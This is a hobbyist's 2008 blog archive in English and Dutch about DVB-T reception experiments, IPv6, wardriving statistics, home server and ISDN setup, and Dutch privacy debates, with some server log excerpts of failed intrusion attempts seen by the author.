News archive 2008 - Koos van den Hout

In browsing some other stuff I found that FM / TV DX-ing is a genuine hobby for some people: trying to receive remote FM / TV stations using good antennas and using special receiving conditions when the signal gets scattered way beyond their normal reach. Thomas Tepe does this and reports about FM / TV receiving conditions on his blog (German). There even is a UKW/TV-Arbeitskreis interested in this subject in the German DX club. They publish complete overviews of transmitters in Germany, Austria, France, the Netherlands, Belgium, Luxembourg and Denmark (german). Their listing of the rtbf dvb-t bouquet matches my experiences with the Belgium Liege transmitter which is a nice plus for me.

Op 13 December had ik een bijzondere kans: als onderdeel van de afscheids activiteiten van vliegbasis Soesterberg organiseerde Vaarwel Vliegbasis Soesterberg een hardloopwedstrijd. Een vriend van ons ging hardlopen, en ik nam de unieke kans waar om eens te fotograferen op vliegbasis Soesterberg. Normaal natuurlijk zwaar verboden wegens militair terrein en actieve vliegbewegingen maar nu kon ik gewoon overal rondlopen met camera. Het was wel koud, en dat kwam goed hard aan op de open vlakte daar. Uiteindelijk een aantal mooie foto's kunnen maken: Startbaanrun 13 December 2008 Vliegbasis Soesterberg - Foto's Koos van den Hout

I tried w_scan again, this time in the highest possible place in the house where I can give the little antenna of the dvb-t stick an outside view. And suddenly 618 MHz is usable and gives me (among other services):

0x0000 0x0450: pmt_pid 0x0000 Digitenne -- TV Noord-Holland (running)
0x0000 0x0457: pmt_pid 0x0000 Digitenne -- Radio Noord-Holland (running)

Some bit errors, but usable signal.

Wardriving results 10 - 28 December: 2959 new networks with GPS locations. The box went along on a few cycling and car trips. I made number 16 in the WiGLE stats without seeing it coming: I was focused on getting 17th place again that I did not notice number 16 being somewhat close.

Christmas: time to visit the family in the south of the Netherlands, and a chance to scan the local tv-spectrum for valid DVB-T signals. German transmitters at 514 MHz: ZDF, 706 MHz: ARD and 602 MHz: ARD regional stations. Germany also seems to have a commercial DVB-T provider at 722 MHz offering several channels with some form of encryption. At 834 MHz I found the rtbf service from Walloon Belgium. It is nice to see how foreign DVB-T transmitters offer local channels.

In hopping between w_scan, scan and tzap to feed dvbsnoop data I found that w_scan leaves 'AUTO' in the channel list and in the generated channels.conf when not updated from the network information table. But, tzap can't parse 'AUTO' entries in channels.conf.

Looking at the network information tables with dvbsnoop shows interesting differences between countries. The Netherlands (Digitenne) shows alternate frequencies, Germany shows alternate frequencies with gps locations of transmitters (for mobile applications?) and Belgium admits you found rtbf.

Going further on the scanning for DVB-T channels I found w_scan, an automatic full-band scanner for DVB-T and DVB-C. The page is in German, but the application itself speaks enough English. This program finds all active DVB-T transmitters and fetches their network information table. On a test run in Utrecht I get:

# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 498000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 522000000 8MHz 2/3 1/2 QPSK 8k 1/4 NONE
T 618000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 706000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 762000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO
T 818000000 8MHz AUTO AUTO AUTO AUTO AUTO AUTO

During frequency scanning it even finds a transmitter at 618 MHz (UHF channel 39) but it can't find any valid data there. At 522 MHz (UHF channel 27) is the DVB-H service marketed as 'Mobile TV' in the Netherlands.

In geen jaren gezien: "Even geduld alstublieft" op televisie. Vanavond was er een storing op Nederland 1, 2 en 3. Berichtgeving: Korte storing bij televisiezenders (nos.nl), Korte storing bij televisiezenders. Screenshots: Nederland 2 Even Geduld Alstublieft, Nederland 3 Even geduld alstublieft. Handig, zo'n dvb-stick en de screenshots optie in mplayer.

I installed the Windows drivers and applications that Hauppauge included with the Nova-T stick to see what they 'know' about dvb-t reception. The application itself never showed what the DVB reception details are. I can see channel number or frequency, but nothing like modulation, guard rate, forward error correcting rate or pid. I eventually found out the WinTV application stores all channel data in a databasefile hcwChanDB_5.mdb but serious browsing of that file using mdbtools shows that the program IDs are listed but those settings aren't. I guess the DVB-T receiver in WinTV is really good at detecting those settings from the TPS (Transmission Parameters Signalling). The only things listed are the frequency and the service_id which is indeed the same as the service number which I can see using scan from dvb-utils.

Searching for the same functionality in Linux did not yield much until I browsed the linux-dvb mailinglist archives. I found that 'AUTO' is a valid setting for a lot of the values for scan. Trying that with the known frequencies does indeed give good results, so I can use that as an option when I can't find the right settings when scanning for German and Belgian dvb-t transmitters.

Google is doing more experiments with IPv6. They now offer the option to selected ISPs to return AAAA records for queries coming in via IPv6. XS4ALL being advanced and always interested in new technologies is participating in this program. But: you have to resolve completely via IPv6 to get an IPv6 address. So I fiddled a little with the setup of bind to use the XS4ALL ipv6 resolver for queries regarding google:

zone "google.com" {
    type forward;
    forward first;
    forwarders {
        2001:888:0:6::66;
        2001:888:0:9::99;
    };
};

And now I get the cool answer:

koos@greenblatt:~$ host www.google.com
www.google.com is an alias for www.l.google.com.
www.l.google.com has address 74.125.77.147
www.l.google.com has address 74.125.77.99
www.l.google.com has address 74.125.77.104
www.l.google.com has address 74.125.77.103
www.l.google.com has IPv6 address 2001:4860:0:1001::68

And the IPv6 instance of google will for example give me IPv6 cache links.

I found out why the two transmitters at 762 and 498 MHz weren't received correctly: I had the forward error correction rate wrong. And I guess scan from dvb-utils doesn't fetch those values from the network information table yet. Updating the table to the correct values:

# Digitenne (Utrecht / Maarssen / Lopik / Amersfoort, The Netherlands)
# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 706000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE  # UHF 50
T 818000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE  # UHF 64
T 762000000 8MHz 2/3 NONE QAM64 8k 1/4 NONE  # UHF 57
T 498000000 8MHz 2/3 NONE QAM64 8k 1/4 NONE  # UHF 24
T 522000000 8MHz 2/3 NONE QPSK 8k 1/4 NONE   # DVB-H: UHF 27

Makes scan find everything, including the 'Mobile TV' services on the DVB-H frequency. DVB-H (Handheld) isn't that different from DVB-T I guess. I found the correct values after a good look at the Radio en TV zenders in Nederland site and its DVB-T and DVB-H listings.

This experience should help me understand scanning for German and Belgian transmitters when I try it in Limburg.

Update : tried it again with only listing the first transmitter, this has the weird effect that the other frequency with the same code rate (818 MHz) is always found and that 762 MHz is sometimes found and 498 MHz never on several tries. I guess scan does try to receive the network information table but does not receive it in full. With dvbshoop -nph 0x10 I do see a nice network table with several frequencies I saw scan try:

            DVB-DescriptorTag: 90 (0x5a)  [= terrestrial_delivery_system_descriptor]
            descriptor_length: 11 (0x0b)
            Center frequency: 0x03412140 (= 546000.000 kHz)
            Bandwidth: 0 (0x00)  [= 8 MHz]
            priority: 1 (0x01)  [= HP (high priority) or Non-hierarch.]
            Time_Slicing_indicator: 1 (0x01)  [= Time Slicing is not used.)]
            MPE-FEC_indicator: 1 (0x01)  [= MPE-FEC is not used.)]
            reserved_1: 3 (0x03)
            Constellation: 2 (0x02)  [= 64-QAM]
            Hierarchy information: 0 (0x00)  [= non-hierarchical (native interleaver)]
            Code_rate_HP_stream: 0 (0x00)  [= 1/2]
            Code_rate_LP_stream: 0 (0x00)  [= 1/2]
            Guard_interval: 3 (0x03)  [= 1/4]
            Transmission_mode: 1 (0x01)  [= 8k mode]
            Other_frequency_flag: 1 (0x01)
            reserved_2: 4294967295 (0xffffffff)

            DVB-DescriptorTag: 98 (0x62)  [= frequency_list_descriptor]
            descriptor_length: 33 (0x21)
            reserved_1: 63 (0x3f)
            coding_type: 3 (0x03)  [= terrestrial]
               Centre_frequency: 0334ec40  (= 538000.000 kHz)
               Centre_frequency: 0371f540  (= 578000.000 kHz)
               Centre_frequency: 03f83c40  (= 666000.000 kHz)
               Centre_frequency: 041cdb40  (= 690000.000 kHz)
               Centre_frequency: 04724e40  (= 746000.000 kHz)
               Centre_frequency: 04af5740  (= 786000.000 kHz)
               Centre_frequency: 04e02b40  (= 818000.000 kHz)
               Centre_frequency: 04ec6040  (= 826000.000 kHz)

Hmm, here are the frequencies I missed:

            DVB-DescriptorTag: 90 (0x5a)  [= terrestrial_delivery_system_descriptor]
            descriptor_length: 11 (0x0b)
            Center frequency: 0x02ebae40 (= 490000.000 kHz)
            Bandwidth: 0 (0x00)  [= 8 MHz]
            priority: 1 (0x01)  [= HP (high priority) or Non-hierarch.]
            Time_Slicing_indicator: 1 (0x01)  [= Time Slicing is not used.)]
            MPE-FEC_indicator: 1 (0x01)  [= MPE-FEC is not used.)]
            reserved_1: 3 (0x03)
            Constellation: 2 (0x02)  [= 64-QAM]
            Hierarchy information: 0 (0x00)  [= non-hierarchical (native interleaver)]
            Code_rate_HP_stream: 1 (0x01)  [= 2/3]
            Code_rate_LP_stream: 0 (0x00)  [= 1/2]
            Guard_interval: 3 (0x03)  [= 1/4]
            Transmission_mode: 1 (0x01)  [= 8k mode]
            Other_frequency_flag: 1 (0x01)
            reserved_2: 4294967295 (0xffffffff)

            DVB-DescriptorTag: 98 (0x62)  [= frequency_list_descriptor]
            descriptor_length: 33 (0x21)
            reserved_1: 63 (0x3f)
            coding_type: 3 (0x03)  [= terrestrial]
               Centre_frequency: 02f7e340  (= 498000.000 kHz)
               Centre_frequency: 0334ec40  (= 538000.000 kHz)
               Centre_frequency: 034d5640  (= 554000.000 kHz)
               Centre_frequency: 0371f540  (= 578000.000 kHz)
               Centre_frequency: 03969440  (= 602000.000 kHz)
               Centre_frequency: 04661940  (= 738000.000 kHz)
               Centre_frequency: 048ab840  (= 762000.000 kHz)
               Centre_frequency: 0496ed40  (= 770000.000 kHz)

But: it takes a while before I see these. Maybe scan is a bit impatient and misses bits of the network information table in this specific case. This is all very theoretical as these frequencies only have scrambled services anyway. But I was too curious why this wasn't working as expected.

Bits! Image! Sound! .. the dvb-t stick works. Really plug and play, I just plugged it in and Ubuntu Linux recognized it and loaded the correct driver. To start the tuning process I had to give it an initial frequency and settings which I stored in /usr/share/doc/dvb-utils/examples/scan/dvb-t/nl-Utrecht:

# Digitenne (Utrecht / Maarssen / Lopik / Amersfoort, The Netherlands)
# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 706000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE

That's enough to start the tuning process, the rest of the frequencies is found automatically:

initial transponder 706000000 0 1 9 3 1 3 0
>>> tune to: 706000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE
Network Name 'Digitenne'
0x0000 0x044d: pmt_pid 0x1b62 Digitenne -- Nederland 1 (running)
0x0000 0x044e: pmt_pid 0x1b6c Digitenne -- Nederland 2 (running)

.. somehow it knows the other frequencies and keeps on going:

retrying with f=818000000
>>> tune to: 818000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_1_2:QAM_64:TRA
NSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE (tuning failed)
0x08a3 0x000b: pmt_pid 0x03f2 Digitenne -- RTL 4 (running, scrambled)
0x08a3 0x000c: pmt_pid 0x03fc Digitenne -- RTL 5 (running, scrambled)

Eventually finding 38 services. When I set up /usr/share/doc/dvb-utils/examples/scan/dvb-t/nl-Utrecht with all the known transmitters, like

# Digitenne (Utrecht / Maarssen / Lopik / Amersfoort, The Netherlands)
# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 706000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE
T 818000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE
T 762000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE
T 498000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE

It still finds nothing on 498 MHz, strangely enough. I don't get 'tuning failed' but I do get errors from the pid filters.
The only thing failing at the moment is the remote: I can't find the right settings for lirc yet. But I haven't tried very hard.

Anyway: digital TV. It works!
Minor update: I learned using dvbsnoop that the 'somehow it knows the other frequencies' comes from the fact that the list of frequencies is included in the DVB standard as the Network Information Table (NIT).
Update 2008-12-18: I found the error correcting rates for two transmitters were wrong, fixed in the DVB experiments page.

Recently my interest in digital video broadcasting was tickled, so I started reading about it again. With television I usually have this 'the technical side is interesting but the content is not interesting' opinion so I am not going to buy a satellite dish at home yet. My ideas on what I want to play with and where are now documented at my DVB experiments page. I did order a simple free-to-air capable dvb-t usb stick so I can play with it. When I get bored with the subject again it's still a way to get some TV news should the cable fail or on the road.

Making those maps for the DVB experiments page was quite a bit more work than expected. I hoped to simply use openstreetmap maps and put some extra points in those but that was harder than expected. I tried gpsdrive but it can't just download openstreetmap street maps. It does have some openstreetmap support but if I get it correctly I'll have to install the whole mapnik program suite first. I skipped that for now. What I did was download maps from openstreetmap using gpsmap from kismet and import those in gpsdrive. Well, the gpsdrive import did not work correctly but I just put the right numbers in map_koord.txt. The waypoints for the transmitters al came from the German Bundesnetzagentur. Being very German and therefore very gründlich (thorough): they list all the active DVB transmitters for all surrounding countries, even where the chance of actual interference is quite small, like Den Burg on Texel in the Netherlands or Viborg in Denmark. With the maps with the transmitters as waypoints shown in gpsdrive I made some screenshots used on the page, with some lightbox 2 sprinkled on top for nice viewing.

New record in ntp.cs.uu.nl traffic: 2429 packets/second of ntp traffic. At that level the server does seem to miss some traffic: according to the pool.ntp.org: Stats for 131.211.84.189 it missed one request from the monitoring system completely, which drops the score several points at once.

Wardriving results 5 - 9 December: 2311 new networks with GPS locations. I'm back at number 17 in the WiGLE stats. Not many days but a few long rides happened in those days and an error in uploading making the oldest results nearly scrolling away from the upload stats.

New weirdness in the system logs: dns queries for names that resolve to nearby IP addresses. At home, an xs4all IP:

Dec  7 08:51:34 gosper named[877]: denied query from [79.111.252.228].4233 for "luna.vulcan.nu" A/IN
Dec  7 08:51:34 gosper named[877]: denied query from [79.111.252.228].4235 for "zuul.xs4all.nl" A/IN
Dec  9 11:42:11 gosper named[877]: denied query from [212.46.197.83].54183 for "luna.vulcan.nu" A/IN
Dec  9 11:42:11 gosper named[877]: denied query from [212.46.197.83].54187 for "zuul.xs4all.nl" A/IN

Both names resolve to xs4all IPs in the same block as my home IP. On a resolver at work:

Dec 09 19:31:01.372 security: info: client 208.37.177.62#46262: query(cache) 'ns.uu.nl/IN' denied
Dec 09 19:45:57.494 security: info: client 204.11.51.61#43318: query(cache) 'ns.uu.nl/IN' denied

either coincidence or signs of some form of searching for security holes. In todays Internet I always assume the latter.

Ik was aan het zoeken naar informatie over en aanbieders van een 'voet' om een satelliet ontvangst schotel op een plat dak te kunnen plaatsen. Niet voor thuis, maar omdat er voor een onderzoeks project op het werk vraag is naar een satelliet schotel.
Opvallend is hoe ik veel en veel meer informatie vind over gemeentes die een Mening hebben over satellietschotels dan over aanbieders van spullen om het goed te doen. Er is een enorme aversie tegen schotelantennes in het straatbeeld. Eigenlijk zijn een beetje de jaren 70 terug toen gemeentes bepaalden dat hun kabelnet de antennes op het dak overbodig maakten, nu willen gemeentes geen schotelantennes in het straatbeeld. De genoemde reden is altijd dat het er slecht uitziet maar het gaat volgens mij om de associatie met bepaalde bevolkingsgroepen (alleen dat noemen is discriminatie, dus gemeentes doen iets aan het symptoom schotelantenne).

Mijn persoonlijke visie is dat de vrijheid van informatievergaring een veel belangrijker grondrecht is dan de wens om niet tegen zaken aan te kijken die niet bevallen. Gelukkig is het Europese verdrag van de rechten van de mens het met me eens en wordt dit nogal eens gebruikt om al te strenge regels of zelfs belastingen op schotelantennes aan te vechten, op zowel 'vrijheid van informatiegaring' als 'vrij verkeer van diensten'.

Op onze vakantie in Denemarken viel het me op hoe normaal schotelantennes daar zijn, ook in gebieden waar kabel een alternatief was. Dat had niets te maken met bepaalde bevolkingsgroepen maar gewoon met de wens meer of andere keuze te hebben aan televisie-content dan geboden via de ether of kabelnet.

Geinspireerd door de zeer uitgebreide collectie bij de UK broadcast transmission gallery heb ik besloten zelf ook wat foto's die ik gemaakt heb van broadcast zenders publiek on-line te zetten. Gelijk is dan ook de uitdaging om meer van deze masten te fotograferen en goeie foto's er van beschikbaar te maken.
Mijn foto's van zendmasten.

Wardriving results 7 November - 4 December: 591 new networks with GPS locations. Still at 18 in the WiGLE stats although I am slowly creeping up on number 17.

Bij een opruimactie kwam ik een doos tegen met 'BBS' er op. Veel papier er in wat toch echt wegkon (rekeningen van walnut creek cdrom). Uitgeprinte mailtjes van wilde ideeën voor het BBS zoals een fax naar Amerika gateway. Maar het mooiste was wel de kerstkaart die we voor het BBS gemaakt hebben in December 1993. Die bewaar ik wel, en de kaart is nu ook on-line te bewonderen. Natuurlijk is de geschiedenis van BBS Koos z'n Doos bijgewerkt met de nieuwe feiten die ik kon halen uit dingen die ik tegen kwam.

Something that got my attention recently: the Dundee satellite receiving station offers access to weather satellite images. Using big dish antennas you can follow via webcam high-resolution images are captured from the weather satellites. The free images are relatively low-resolution (still filling the screen) but it is a nice enough resolution to get a view of the weather over Europe and see low-pressure areas develop.

Stuff computers are better at: shutting down at the wanted time. Just a simple:

root@hostname:~# at 23:01
warning: commands will be executed using /bin/sh
at> shutdown -h now
at> <EOT>
job 3 at Mon Dec  1 23:01:00 2008
root@hostname:~# 

The <EOT> was were I pressed ctrl-d. You might say "why not shutdown -h 23:01 ?". Well, your users will be bothered by the announcements between now and the shutdown time.

Linux Foundation Workgroup Tackles Federal Mandate for Next-Generation Internet Protocol. It seems there were parts of (some) Linux distributions not IPv6 compliant enough for the US DoD (Department of Defense) mandate, and now they are. Good news for Linux implementations. Modern microsoft implementations (XP, Vista) will be at the same level.

Good news for IPv6 mainly: the department of defense is a serious buyer of network hardware and software. Mandating IPv6 compliance for everything means hardware producers and software producers get a big push to implement and actually test IPv6.

Somehow the style of the announcement and the list of vendor names reminds me of the whole y2k craze.

Loads and loads of spam for 'Canadian Pharmacy'. Spam rates are in messages per hour. I noticed that the sending machines are almost all in south-america and the sites pointed at seem to live at IPs in China. But with very short TTL values so they can change any minute. Literally:

;; ANSWER SECTION:
currentneighbor.com.    60      IN      A       203.93.208.87

Other standards like valid SOA records and stuff like that aren't needed, potential customers just have to be able to reach the spamvertised site. I haven't seen a lot of IPs (yet). All running nginx, the choice of spammers and virus-spreaders. Or rather guided by language: the documentation for nginx is in russian so that part of the cybercriminals of this world can read it. Since nginx can do a lot with proxying I guess there is just a proxy at that IP pointing somewhere else where the real processing happens (or maybe that just goes to another proxy). I received 94 of these spams in the last 2 days (sofar). I can't imagine anybody receiving this not seeing that this must be some kind of scam.

The US has been rick-rolled. Thoroughly. The Macy's thanksgiving day parade, one of the things a lot of people watch on TV in the US featured Rick Ashley with an unexpected Rick-Roll. NBC does not make it over here, but irc lightened up with remarks about it.
Web sources: Thanks for the Rickroll, NBC (Average Dudes), Macy's Thanksgiving Day Parade Gets Rick Rolled (YouTube). Not too great video quality, but it shows the timing of the joke nicely.

Noted at AMS-IX breaks a gig by Derek Morr: Living with IPv6: The AMS-IX, Amsterdam Internet Exchange has broken the barrier of 1 gigabit/second IPv6 traffic. Their total traffic is at 564 gigabit/second but this is still a nice peak in IPv6 traffic.

I'm seeing traces of a massive and coordinated ssh dictionary attack. Talking on irc and checking usenet about it shows the same names being tried at the same time in the US, England and Japan, and mentioned IPs also showing up at other times on hosts. For example, from two hosts with adjacent IPs:

Nov 26 14:52:16 idefix sshd[63866]: Illegal user cleopatra from 85.207.120.188
Nov 26 14:52:16 idefix sshd[63866]: Failed unknown for illegal user cleopatra from 85.207.120.188 port 55938 ssh2

Nov 26 14:52:16 web-3 sshd[63867]: Illegal user cleopatra from 85.207.120.188
Nov 26 14:52:16 web-3 sshd[63867]: Failed unknown for illegal user cleopatra from 85.207.120.188 port 55939 ssh2

One funky botnet at work? Trying to find unix boxes for mischief?

A web search yields more mention of the IP above at What is with the script kiddies tonight??.

Het panopticon dook vandaag op voor het gebouw waar ik werk: bewakings camera's gemonteerd aan een lantaarnpaal met spanbanden en duct-tape. Twee standaard camera's in tegenovergestelde richtingen over de bus baan (met op het oog infrarood schijnwerpers) en twee dome camera's (die dus rond kunnen draaien). Ik vroeg aan de man die bezig was met de installatie of de camera's van de gemeente waren en het bleek om een stiptheidsmeting van de bussen te gaan. Ik vraag me af hoe effectief een stiptheidsmeting is als er een stel zeer zichtbare camera's voor geinstalleerd worden. En ik vraag me ook af of dome camera's daarvoor helpen.

First winter weather of this season: it snowed in large parts of the Netherlands yesterday. As a result the number of visitors to webcam.idefix.net quadrupled. Most interesting new link to this webcam I found was an Italian site about the Netherlands where I think they describe it as a view of a palace. No, it's just a university building.

A busy weekend filled with being available to fix the network for Nwerc 2008. But the network decided to behave and most of the work was just in making all the computers return to their normal state as soon as the competition was over. Funny how thoroughly re-imaging all the systems helps availability: this morning we have a 100% availability of student computers. That does not happen very often: 86 computers with an issue where they shutdown their network card from time to time will usually show a few missing ones.

The other thing I managed to find some time for was work on the new home server greenblatt. In the previous week I spent some evenings migrating all my nameservices to a new configuration where the old homeserver is primary and I duplicated this structure to greenblatt so this stuff will keep running once I swap systems. In the weekend I copied and tested all the configs for web sites running at home such as webcam.idefix.net. Lots of little details show up in the configs which don't work out of the box. I do use the ubuntu package for apache2 now because everything I want in a webserver is available in the package. And trying to squeeze the last bit of optimization from it is not necessary with gigahertzes plenty and upstream bandwidth probably the first bottleneck.

I just noticed that XS4ALL has a first service with a published IPv6 address without using .ipv6. in the name.

$ host -t any resolver.xs4all.nl
resolver.xs4all.nl has AAAA address 2001:888:0:6::66
resolver.xs4all.nl has AAAA address 2001:888:0:9::99
resolver.xs4all.nl has address 194.109.9.99
resolver.xs4all.nl has address 194.109.6.66
resolver.xs4all.nl has address 194.109.104.104

Resolving is one thing which will either break completely when there is an IPv6 connectivy problem or work fine with or without. So this is a 'safe' service to start with.

End of an era: I noticed today that the METAR for EHSB (Soesterberg) wasn't updated anymore. The last one I found:

2008/11/20 09:25
EHSB 200925Z AUTO 28014KT 9999 // 11/09 Q1010

The Soesterberg Wolfhounds were already gone but now all normal flying seems to be terminated and the meteorologist has stopped.

Happy birthday: 20 years of Internet in the Netherlands. Given the fact that I first experienced hands-on Internet at a traineeship at FOM Rijnhuizen in 1991 I thought Internet for research networks in the Netherlands were older. But the push to use committee-standards based X.25 networks was very strong in the Netherlands (and in the rest of Europe) which held back TCP/IP for a while. I remember working at Cetis when the Hogeschool had Internet access and still hearing people talk about grant proposals to be read by the European Union directorate on telecommunications and regulations (DG-XIII) making sure there was absolutely no mention of "Internet" or "TCP/IP" in those proposals but generic terms like "a telecommunications network" so the DG-XIII wouldn't deny them right away because "Internet" was America-centric.

Ook ik kreeg een stembiljet voor de waterschaps verkiezingen. Met keurig alle controlenummers er op en de mededeling dat ik mijn geboortedatum moet invullen omdat anders mijn stem ongeldig is. Mijn conclusie: er moet dus heel duidelijk een controleerbare link zijn tussen mijn stem en mijn identiteit. Zo werkt het stemgeheim vooral niet, en dat is ook waar de actiegroep wij vertrouwen stemcomputers niet bezwaar tegen heeft gemaakt. Als ik niet stem telt dat voor het waterschap natuurlijk als 'niet geinterreseerd'. Ik stem blanco: het enige wat ik veilig kan stemmen als terug te vinden is wie wat stemt.

Ik was op zoek naar een hosting oplossing. Mijn wensen zijn simpel: Linux debian of ubuntu, 512 Mb memory, 10G disk, 10G traffic/maand, root access, 1 IPv4 IP. De gemiddelde VPS aanbieding past daar prima bij. Maar.. een ding verandert de zaak: ik wil ook ipv6. Liefst native. Als voorstander van ipv6 moet ik natuurlijk ook zelf een keer zorgen dat het geheel via ipv6 bereikbaar wordt. De enige die ik vond die het native ondersteund is ShockMedia maar die zitten voor mijn wensen net op een onhandige plek: 256 Mb of 768 Mb geheugen en 5G of 50G per maand traffic. Ga ik toch van 35 euro/maand naar 70 euro/maand (vast ex btw).

Ik zou het wel kunnen oplossen met een ipv6 tunnel maar dat moet dan maar net weer samenwerken met het door de hoster gekozen virtualisatie pakket. Vaak is daarvoor medewerking nodig van de beheerder van de fysieke server, en bij een budgethoster verwacht ik eigenlijk ook niet dat ze dit soort specials ondersteunen.

Met een eigen server is dat probleem weer wat minder maar dan wordt het geheel weer wat prijzig.
Allemaal afwegingen. VPS hosters zijn niet zo makkelijk te vinden in Nederland, misschien zie ik er een over het hoofd die dit allemaal wel heeft.
Update: Ze zijn er wel: aanbieders van VPS hosting met ipv6 support, na zoeken en wachten op wat vragen aan diverse sales afdelingen:

• XLS Hosting vraag naar ipv6 aangeven bij aanvraag vps.
• Eliveld Networks B.V. de hele VPS optie staat momenteel niet op de site maar is er wel
• BudgetDedicated.com ipv6 aangeven op het aanvraagformulier of later zelf aanzetten.

Update: Maar het hele hosting idee gaat niet door, ik blijf alles thuis draaien op de eigen thuisserver greenblatt met IPv4 en IPv6 van xs4all.

Volgens een artikel in Ouders Online over het electronisch patienten dossier (EPD) is er ook nog een interresante link tussen de bouwers van het 'Schakelpunt' voor het electronisch patienten dossier, CSC Computer Sciences en de amerikaanse NSA. Ik moet me dus niet alleen zorgen maken over misbruik door de nederlandse justitie en veiligheidsdienst maar ook over misbruik door de amerikaanse veiligheidsdiensten.

Wardriving results 30 October - 6 November: 1617 new networks with GPS locations.

Henk van de Kamer is ondubbelzinnig over het electronisch patienten dossier. Ik heb geen brief gezien dus ik vrees dat'ie ook aangezien is voor reclame. Tijd om zelf ook een bezwaarschrift epd in te dienen. Als er een voorbeeld is van de enige manier om informatie echt blijvend te beschermen tegen alle vormen van misbruik is deze niet te verzamelen dan is het wel het epd (electronisch patienten dossier).

Ik vertel liever aan een behandelend arts in persoon welke allergieën ik heb en niet heb dan dat dit uit een computersysteem moet komen waarin gegevens niet volgens standaarden uitgewisseld worden. Zoals Henk ook aangeeft: de gebruikers zullen teveel denken dat omdat het uit de computer komt het allemaal klopt. En deze gegevens uitwisseling is veel te interresant voor misbruik zoals inzage door werkgevers, verzekeringen, politie of 'veiligheids' diensten dus er zal misbruik komen. Om dit veilig uit te wisselen moet je een netwerk opzetten van militaire proporties en met militaire procedures voor versleuteling en toegangscontrole. Ik verwacht niet dat mensen in de zorg die niet zo bekend staan als veilig omgaand met gegevens en computersystemen ineens het militaire niveau van computer beveiliging gaan gebruiken.

En het is natuurlijk ook waanzin dat ook dit er weer doorgeduwt wordt voor er politieke overeenstemming over is.

In een reactie op Bewoners zorgggroep[sic] tegen UMTS mast staat een reactie van stopumts.nl. Zo te zien een volledige automatische reactie die ze onder elk bericht over UMTS plakken. Ik schoot wel even in de lach over de "Ongesubsidieerd en Onafhankelijk." bewering van stopumts. Ongesubsidieerd vast, maar een entiteit die elke discussie over antennes probeert dood te slaan met hun visie 'onafhankelijk' noemen is nogal lachwekkend. Probeer eens 'vooringenomen'.

When the heating started working for winter I noticed that the crawl space temperature was going up in the same patterns as the living room temperature. It looked like the whole crawl space was heated. I already wondered about the relation between crawl space temperature and heating up the room back in September. So the results are in: Not really necessary and costing us money. I looked in the crawl space and noticed that there is a really long set of heating pipes from the back of the house to the front (over 8 meters long). This has to do with the old design: the first central heating was in the shed in the garden. The long pipes pass within a meter of the temperature sensor. So I put pipe isolation on the long run, now to check the graphs for improvement.

Eind jaren 80 en begin jaren 90 keek ik graag naar de WDR computerclub. Wolfgang en Wolfgang waren een beetje aan het hobbyen met computers en maakten daar TV van. Ik herinner me nog een uitzending waarin Wolfgang Back vertelde dat'ie voor de 4e keer een computer opgeblazen had in de voorbereiding van het programma. Sinds ik in Utrecht woon (1997) moet ik het zonder WDR doen (zit niet meer op de analoge kabel, een vaag grieks kanaal schijnt belangrijker te zijn en Ziggo gaat gewoon het analoge pakket krimpen voor meer digitale kanalen in dezelfde ruimte) dus heb ik het sindsdien niet meer gezien. Het programma op de WDR tv is op 22 februari 2003 gestopt.

Naar aanleiding van wat andere WDR dingen die ik ergens zag zocht ik vandaag even op 'WDR computerclub' en kwam toen tegen hoe het er mee gaat: De heren zijn in Juli 2006 weer begonnen. Eerst met een 'audio sendung' (podcast) en daarnaast later weer terug op tv op een regionale zender in Duitsland. En een website om het geheel te ondersteunen Computer:club 2 waar ook de tv uitzendingen terug te zien zijn. Ooit on-line met de 'Komcom' (Kommunikations Computer, een BBS) maar ze hebben het web omarmt (ze hadden de eerste website van de WDR). Ze zien er nu wat ouder uit (eigenlijk waren ze pensioen gerechtigd) maar hobbyen voor de camera kunnen ze niet laten. Hun sterke meningen zijn er ook niet minder sterk op geworden (en dankzij het web kunnen ze die nu nog makkelijker uiten). En er zijn nog steeds heel veel luisteraars en kijkers voor.

Het blijft duitstalig, en daar krijg ik niet altijd alle nuances van mee. Maar het is leuk om ze weer eens te horen/zien.

Met al het testen van ISDN opties zou het wel handig zijn om een ISDN toestel met display te hebben. Iemand toevallig eentje in de aanbieding voor niet al te veel? Of ruilen voor een Sun Sparcstation 20 of Ultra-1.

Sunday evening I finally had time to look at the new home server greenblatt and I tried to get the sitecom dc-105 isdn card in NT (network termination) mode connected to the fixed line (outside) isdn port of the fritz!box 7170. It took a bit of work as a lot of documentation about the mISDN drivers mentions NT mode but the needed cable isn't very well documented. I finally found it, chapter 2.2 of the PBX4Linux manual. By itself the crossed cable did not work (and the fritz!box is good at diagnosing problems with SIP dialing, but just goes 'meh' when ISDN dialing fails). I didn't need the fancy solution with power, but I had to look for a while for termination resistors. I remembered the sitecom dc-105 isdn card had some jumpers near the ISDN port. Those are indeed 100 ohm ISDN termination resistors. Nowhere to be found in any of the manuals of the dc-105 online.

After setting those jumpers it all started working. At first the dialtone sounded weird but that was caused by

[general]
country=us

in indications.conf. Changing this to

[general]
country=nl

made it suddenly sound a lot more familiar: KPN style. Now the test calls are running again via the modem connected to the fritz!box.
Conclusion: the jumpers on the sitecom dc-105 are isdn termination jumpers and can help to make an NT mode cross cable work.

